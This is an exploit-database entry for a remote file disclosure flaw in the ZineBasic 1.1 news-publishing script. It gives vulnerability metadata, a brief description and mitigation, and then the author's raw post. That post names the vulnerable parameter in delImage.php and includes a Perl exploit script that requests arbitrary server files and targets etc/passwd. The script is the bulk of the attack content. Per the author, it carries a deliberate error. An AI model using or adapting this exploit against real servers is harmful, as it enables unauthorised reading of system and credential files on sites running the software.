ZineBasic 1.1 Remote File Disclosure Exploit

vendor:

ZineBasic

by:

bd0rk

7,5

CVSS

HIGH

Remote File Disclosure

434

CWE

Product Name: ZineBasic

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:w2scripts:zinebasic:1.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu-Linux

2016

ZineBasic 1.1 Remote File Disclosure Exploit

ZineBasic 1.1 is vulnerable to a remote file disclosure vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This will allow the attacker to view the contents of any file on the server.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

# Title: ZineBasic 1.1 Remote File Disclosure Exploit
# Author: bd0rk || East Germany former GDR
# Tested on: Ubuntu-Linux
# Vendor: http://w2scripts.com/news-publishing/
# Download: http://downloads.sourceforge.net/project/zinebasic/zinebasic/v1.1/zinebasic_v1.1_00182.zip?r=https%3A%2F%2Fsourceforge.net%2Fprojects%2Fzinebasic%2F&ts=1474313108&use_mirror=master
# Twitter: twitter.com/bd0rk

#Greetings: zone-h.org, Curesec GmbH, SiteL GmbH, i:TECS GmbH, rgod, GoLd_M
----------------------------------------------------------------------------------
=> Vulnerable sourcecode in /zinebasic_v1.1_00182/articleImg/delImage.php line 12

=> Vulnerable snippet: $id = $_GET['id'];

----------------------------------------------------------------------------------

Exploitcode with little error inline 25-->'Gainst script-kiddies! || Copy&Paste:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl
use LWP::Simple;
use LWP::UserAgent;
sub ex()
{
print "Usage: perl $0 someone.com /ZineBasic_Dir/\n";
print "\nZineBasic 1.1 Remote File Disclosure Exploit\n";
print "\ Contact: twitter.com/bd0rk\n";
($host, $path, $under, $file,) = @ARGV;
$under="/articleImg/";
$file="delImage.php?id=[REMOTE_FILE]";
my $target = "http://".$host.$path.$under.$file;
my $usrAgent = LWP::UserAgent->new();
my $request = $usrAgent->get($target,":content_file"=>"[REMOTE_FILE]");
if ($request->is_success)
{
print "$target <= JACKPOT!\n\n";
print "etc/passwd\n";
exit();
}
else
{
print "Exploit $target FAILED!\n[!].$request->status_line.\n";
exit();
}